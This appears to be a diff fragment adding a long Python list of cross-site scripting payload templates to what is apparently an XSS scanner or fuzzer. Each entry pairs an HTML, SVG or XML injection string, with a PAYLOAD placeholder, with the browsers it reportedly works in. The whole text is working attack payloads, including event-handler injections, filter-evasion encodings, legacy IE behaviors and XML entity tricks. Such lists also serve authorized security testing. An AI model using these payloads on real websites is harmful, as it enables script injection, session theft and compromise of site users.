+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<object src=1 href=1 onerror="PAYLOAD"></object>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<script src=1 href=1 onerror="PAYLOAD"></script>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<svg onResize svg onResize="javascript:PAYLOAD"></svg onResize>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<title onPropertyChange title onPropertyChange="javascript:PAYLOAD"></title onPropertyChange>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<iframe onLoad iframe onLoad="javascript:PAYLOAD"></iframe onLoad>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<body onMouseEnter body onMouseEnter="javascript:PAYLOAD"></body onMouseEnter>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<body onFocus body onFocus="javascript:PAYLOAD"></body onFocus>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<frameset onScroll frameset onScroll="javascript:PAYLOAD"></frameset onScroll>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<script onReadyStateChange script onReadyStateChange="javascript:PAYLOAD"></script onReadyStateChange>''',
+          'browser':"""[IE] [Chrome]"""},
+ 		{ 'payload':'''<html onMouseUp html onMouseUp="javascript:PAYLOAD"></html onMouseUp>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<body onPropertyChange body onPropertyChange="javascript:PAYLOAD"></body onPropertyChange>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<svg onLoad svg onLoad="javascript:PAYLOAD"></svg onLoad>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<body onPageHide body onPageHide="javascript:PAYLOAD"></body onPageHide>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<body onMouseOver body onMouseOver="javascript:PAYLOAD"></body onMouseOver>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<body onUnload body onUnload="javascript:PAYLOAD"></body onUnload>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<body onLoad body onLoad="javascript:PAYLOAD"></body onLoad>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<bgsound onPropertyChange bgsound onPropertyChange="javascript:PAYLOAD"></bgsound onPropertyChange>''',
+          'browser':"""[HTML5 Injection]"""},
+ 		{ 'payload':'''<html onMouseLeave html onMouseLeave="javascript:PAYLOAD"></html onMouseLeave>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<html onMouseWheel html onMouseWheel="javascript:PAYLOAD"></html onMouseWheel>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<style onLoad style onLoad="javascript:PAYLOAD"></style onLoad>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<iframe onReadyStateChange iframe onReadyStateChange="javascript:PAYLOAD"></iframe onReadyStateChange>''',
+          'browser':"""[IE] [Chrome]"""},
+ 		{ 'payload':'''<body onPageShow body onPageShow="javascript:PAYLOAD"></body onPageShow>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<style onReadyStateChange style onReadyStateChange="javascript:PAYLOAD"></style onReadyStateChange>''',
+          'browser':"""[IE] [Chrome]"""},
+ 		{ 'payload':'''<frameset onFocus frameset onFocus="javascript:PAYLOAD"></frameset onFocus>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<applet onError applet onError="javascript:PAYLOAD"></applet onError>''',
+          'browser':"""[HTML5 Injection]"""},
+       	{ 'payload':'''<marquee onStart marquee onStart="javascript:PAYLOAD"></marquee onStart>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+		{ 'payload':'''<script onLoad script onLoad="javascript:PAYLOAD"></script onLoad>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+		{ 'payload':'''<html onMouseOver html onMouseOver="javascript:PAYLOAD"></html onMouseOver>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+		{ 'payload':'''<html onMouseEnter html onMouseEnter="javascript:parent.PAYLOAD"></html onMouseEnter>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+		{ 'payload':'''<body onBeforeUnload body onBeforeUnload="javascript:PAYLOAD"></body onBeforeUnload>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+		{ 'payload':'''<html onMouseDown html onMouseDown="javascript:PAYLOAD"></html onMouseDown>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+		{ 'payload':'''<marquee onScroll marquee onScroll="javascript:PAYLOAD"></marquee onScroll>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<xml onPropertyChange xml onPropertyChange="javascript:PAYLOAD"></xml onPropertyChange>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<frameset onBlur frameset onBlur="javascript:PAYLOAD"></frameset onBlur>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<applet onReadyStateChange applet onReadyStateChange="javascript:PAYLOAD"></applet onReadyStateChange>''',
+		  'browser':"""[IE] [Chrome]"""},
+		{ 'payload':'''<svg onUnload svg onUnload="javascript:PAYLOAD"></svg onUnload>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<html onMouseOut html onMouseOut="javascript:PAYLOAD"></html onMouseOut>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onMouseMove body onMouseMove="javascript:PAYLOAD"></body onMouseMove>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onResize body onResize="javascript:PAYLOAD"></body onResize>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<object onError object onError="javascript:PAYLOAD"></object onError>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onPopState body onPopState="javascript:PAYLOAD"></body onPopState>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<html onMouseMove html onMouseMove="javascript:PAYLOAD"></html onMouseMove>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<applet onerror applet onerror="javascript:PAYLOAD"></applet onerror>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onkeyup body onkeyup="javascript:PAYLOAD"></body onkeyup>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onunload body onunload="javascript:PAYLOAD"></body onunload>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<iframe onload iframe onload="javascript:PAYLOAD"></iframe onload>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onload body onload="javascript:PAYLOAD"></body onload>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<html onmouseover html onmouseover="javascript:PAYLOAD"></html onmouseover>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<object onbeforeload object onbeforeload="javascript:PAYLOAD"></object onbeforeload>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onbeforeunload body onbeforeunload="javascript:PAYLOAD"></body onbeforeunload>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onfocus body onfocus="javascript:PAYLOAD"></body onfocus>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onkeydown body onkeydown="javascript:PAYLOAD"></body onkeydown>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<iframe onbeforeload iframe onbeforeload="javascript:PAYLOAD"></iframe onbeforeload>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<iframe src iframe src="javascript:PAYLOAD"></iframe src>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<svg onload svg onload="javascript:PAYLOAD"></svg onload>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<body onblur body onblur="javascript:PAYLOAD"></body onblur>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<form id="X" /><button form="X" formaction="javascript:PAYLOAD">X''',
+		  'browser':"""[HTML5 Injection]"""},
+		{ 'payload':'''<input onfocus=PAYLOAD autofocus>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<input onblur=PAYLOAD autofocus><input autofocus>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<video poster=javascript:PAYLOAD//''',
+		  'browser':"""[HTML5 Injection]"""},
+		{ 'payload':'''<body onscroll=PAYLOAD><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<form id=X onforminput=PAYLOAD><input></form><button form=X onformchange=PAYLOAD>X''',
+		  'browser':"""[HTML5 Injection]"""},
+		{ 'payload':'''<video><source onerror="javascript:PAYLOAD">''',
+		  'browser':"""[Opera10.5+] [Chrome]"""},
+		{ 'payload':'''<video onerror="javascript:PAYLOAD"><source>''',
+		  'browser':"""[FF3.5+]"""},
+		{ 'payload':'''<form><button formaction="javascript:PAYLOAD">X''',
+		  'browser':"""[HTML5 Injection]"""},
+		{ 'payload':'''<body oninput=PAYLOAD><input autofocus>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<math href="javascript:PAYLOAD">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:PAYLOAD">CLICKME</maction> </math>''',
+		  'browser':"""[FF]"""},
+		{ 'payload':'''<frameset onload=PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<table background="javascript:PAYLOAD">''',
+		  'browser':"""[Opera8|Opera10.5+] [IE6.0]"""},
+		{ 'payload':'''<!--<img src="--><img src=x onerror=PAYLOAD//">''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<comment><img src="</comment><img src=x onerror=PAYLOAD)//">''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<![><img src="]><img src=x onerror=PAYLOAD//">''',
+		  'browser':"""[FF] [Opera]"""},
+		{ 'payload':'''<style><img src="</style><img src=x onerror=PAYLOAD//">''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<li style=list-style:url() onerror=PAYLOAD> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=PAYLOAD></div>''',
+		  'browser':"""[Opera10.5+]"""},
+		{ 'payload':'''<head><base href="javascript://"></head><body><a href="/. /,PAYLOAD//#">XXX</a></body>''',
+		  'browser':"""[Opera8|Opera10.5] [IE]"""},
+		{ 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>PAYLOAD</SCRIPT>''',
+		  'browser':"""[Opera] [IE]"""},
+		{ 'payload':'''<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(PAYLOAD)"></OBJECT>''',
+		  'browser':"""[IE9.0]"""},
+		{ 'payload':'''<b <script>alert(PAYLOAD)</script>0''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<div id="div1"><input value="``onmouseover=PAYLOAD"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':"""<x '='foo'><x foo='><img src=x onerror=PAYLOAD//'>""",
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<div style=width:1px;filter:glow onfilterchange=PAYLOAD>x''',
+		  'browser':"""[IE]"""},
+		{ 'payload':"""<x '="foo"><x foo='><img src=x onerror=PAYLOAD//'>""",
+		  'browser':"""[IE6.0]"""},
+		{ 'payload':'''<? foo="><script>PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<! foo="><script>PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''</ foo="><script>PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<? foo="><x foo="?><script>PAYLOAD</script>">">''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<! foo="[[[Inception]]"><x foo="]foo><script>PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<% foo><x foo="%><script>PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<div id=d><x xmlns="><iframe onload=PAYLOAD"></div> <script>d.innerHTML=d.innerHTML</script>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:PAYLOAD>XXX</a>''',
+		  'browser':"""[Safari] [Chrome]"""},
+		{ 'payload':'''<img src="x` `<script>PAYLOAD</script>"` `>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<img src onerror /" '"= alt=PAYLOAD//">''',
+		  'browser':"""[Safari]"""},
+		{ 'payload':'''<title onpropertychange=PAYLOAD></title><title title=>''',
+		  'browser':"""[IE9.0]"""},
+		{ 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=PAYLOAD></a>">''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<!--[if]><script>PAYLOAD</script -->''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<!--[if<img src=x onerror=PAYLOAD//]> -->''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<script src="/\PAYLOAD"></script>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<script src="\\PAYLOAD"></script>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':"""<a style="-o-link:'javascript:PAYLOAD';-o-link-source:current">X""",
+		  'browser':"""[Opera]"""},
+		{ 'payload':"""<style>p[foo=bar{}*{-o-link:'javascript:PAYLOAD'}{}*{-o-link-source:current}]{color:red};</style>""",
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<link rel=stylesheet href=data:,*%7bx:expression(PAYLOAD)%7d''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<style>@import "data:,*%7bx:expression(PAYLOAD)%7D";</style>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="PAYLOAD;">XXX</a></a><a href="javascript:PAYLOAD">XXX</a>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<script>({set/**/$($){_/**/setter=$,_=PAYLOAD}}).$=eval</script>''',
+		  'browser':"""[FF]"""},
+		{ 'payload':'''<script>({0:#0=eval/#0#/#0#(PAYLOAD)})</script>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<script>ReferenceError.prototype.__defineGetter__('name', function(){PAYLOAD}),x</script>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('PAYLOAD')()</script>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<script src="#">{PAYLOAD}</script>;1''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),PAYLOAD;''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<b><script<b></b><PAYLOAD</script </b>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<script<{PAYLOAD}/></script </>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<script>crypto.generateCRMFRequest('CN=0',0,0,null,'PAYLOAD',384,null,'rsa-dual-use')</script>''',
+		  'browser':"""[FF]"""},
+		{ 'payload':'''<script>[{'a':Object.prototype.__defineSetter__('b',function(){eval(arguments[0])}),'b':['PAYLOAD']}]</script>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:PAYLOAD"></g></svg>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><script>PAYLOAD</script></svg>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<svg onload="javascript:PAYLOAD" xmlns="http://www.w3.org/2000/svg"></svg>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:PAYLOAD"><rect width="1000" height="1000" fill="white"/></a> </svg>''',
+		  'browser':"""[FF]"""},
+		{ 'payload':'''<?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("PAYLOAD#x") format("svg");} body {font: 100px "y";} </style> </head> <body>X</body> </html>''',
+		  'browser':"""[Opera 10]"""},
+		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:PAYLOAD"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='PAYLOAD'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(PAYLOAD)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:PAYLOAD"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3EPAYLOAD%3C/script%3E"/> </svg>''',
+		  'browser':"""[Opera] [FF]"""},
+		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="PAYLOAD"/> <animate attributeName="onunload" to="PAYLOAD"/> </svg>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">PAYLOAD</handler> </svg>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E PAYLOAD %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:PAYLOAD"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">PAYLOAD</handler> </svg>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<svg><style>&ltimg/src=x onerror=PAYLOAD// </b>''',
+		  'browser':"""[FF]"""},
+		{ 'payload':'''<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:PAYLOAD"/>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.PAYLOAD</script></svg>")'></svg>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<?xml-stylesheet href="javascript:PAYLOAD"?>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<!DOCTYPE x[<!ENTITY x SYSTEM "PAYLOAD">]><y>&x;</y>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "PAYLOAD"><x>&x;</x>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='X'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3EPAYLOAD%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "x" onerror CDATA "PAYLOAD"> ]><img /><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:PAYLOAD" xlink:type="simple">XXX</x> </doc>''',
+		  'browser':"""[Opera] [FF]"""},
+		{ 'payload':'''<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:PAYLOAD"/></onevent><timer value="1"/></card>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<?xml-stylesheet type="text/css"?><root style="x:expression(PAYLOAD)"/>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:PAYLOAD" xlink:type="simple"/>''',
+		  'browser':"""[FF]"""},
+		{ 'payload':'''<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(PAYLOAD);%7d"?>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:PAYLOAD"><x:timer value="1"/></x:template>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:PAYLOAD//#x"/>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="PAYLOAD#x"/>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''X<x style=`behavior:url(#default#time2)` onbegin=`PAYLOAD` >''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=PAYLOAD&gt;`>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=PAYLOAD&gt;>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:PAYLOAD strokecolor=white strokeweight=1000px from=0 to=1000 /></a>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<a style="behavior:url(#default#AnchorClick);" folder="javascript:PAYLOAD">XXX</a>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<event-source src="PAYLOAD" onload="PAYLOAD">''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<a href="javascript:PAYLOAD"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=PAYLOAD&gt;">''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<SCRIPT SRC=PAYLOAD?<B>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<SCRIPT/SRC="PAYLOAD"></SCRIPT>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<iframe src=PAYLOAD <''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<LAYER SRC="PAYLOAD"></LAYER>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<STYLE>li {list-style-image: url("javascript:PAYLOAD");}</STYLE><UL><LI>X''',
+		  'browser':"""[Not Info]"""},
+   		{ 'payload':'''<META HTTP-EQUIV="Link" Content="<PAYLOAD>; REL=stylesheet">''',
+		  'browser':"""[Opera 8]"""},
+		{ 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:PAYLOAD")}</STYLE>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:PAYLOAD"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;PAYLOAD&lt;/SCRIPT&gt;"></BODY></HTML>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<P STYLE="behavior:url('#default#time2')" end="0" onEnd="PAYLOAD">''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<STYLE>a{background:url('s1' 's2)}@import javascript:PAYLOAD;');}</STYLE>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>PAYLOAD&&;&&<&&/script&&>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<SCRIPT onreadystatechange=javascript:PAYLOAD;></SCRIPT>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<style onreadystatechange=javascript:PAYLOAD;></style>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>PAYLOAD;</html:script></html:html>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<embed code=javascript:PAYLOAD;></embed>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<frameset onload=javascript:PAYLOAD></frameset>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<object onerror=javascript:PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<embed type="image" src=PAYLOAD></embed>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<a href="jav&#65ascript:PAYLOAD">X1</a>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<a href="jav&#97ascript:PAYLOAD">X1</a>''',
+		  'browser':"""[Opera]"""},
+		{ 'payload':'''<embed width=500 height=500 code="data:text/html,<script>PAYLOAD</script>"></embed>''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=PAYLOAD&amp;gt;>">''',
